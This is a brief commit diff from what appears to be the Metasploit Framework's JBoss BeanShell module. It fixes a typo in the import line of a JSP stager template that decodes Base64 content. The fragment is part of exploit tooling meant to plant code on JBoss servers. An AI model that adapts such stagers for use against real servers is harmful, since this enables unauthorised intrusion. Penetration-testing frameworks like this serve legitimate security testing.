Fixed a typo introduced in commit 9e92448

bug/bundler_fix
us3r777 2014-07-29 09:04:12 +02:00
parent 2efeb850ee
commit d6c7eb8850
1 changed files with 2 additions and 1 deletions

View File

@ -50,7 +50,8 @@ module Msf::HTTP::JBoss::BSH
jboss_home_var = Rex::Text.rand_text_alpha(8+rand(8))
fos_var = Rex::Text.rand_text_alpha(8+rand(8))
stager_jsp = <<-EOT
<%@page import="java.iowindowsjava.util.*,
<%@page import="java.io.*,
java.util.*,
sun.misc.BASE64Decoder"
%>
<%